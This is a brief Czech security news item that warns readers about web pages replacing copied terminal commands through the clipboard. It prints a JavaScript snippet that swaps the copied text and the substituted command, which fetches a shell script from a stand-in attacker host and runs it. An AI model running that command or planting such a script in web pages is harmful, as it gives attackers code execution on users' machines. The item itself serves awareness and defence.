Často se uvádí, nekopírujte příkazy z internetu o kterých nevíte, co dělají. Nově raději nekopírujte i příkazy, které znáte. Na příkladu blogu Wizeru zkuste okopírovat příkaz sudo apt update a vložit jej do terminálu. Kupodivu dostanete curl http://attacker-domain:8000/shell.sh | sh.
Za záměnu může jednoduchý JS kód:
<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); });
</script>
Pokud kopírujete v Linuxu pomocí označení a prostředního tlačítka myši, tak se zkopíruje opravdu označený text. Pomocí CTRL+C a CTRL+V již dostanete podvržený text z JS.
(zdroj: bleepingcomputer)
ČLÁNKY DO MAILU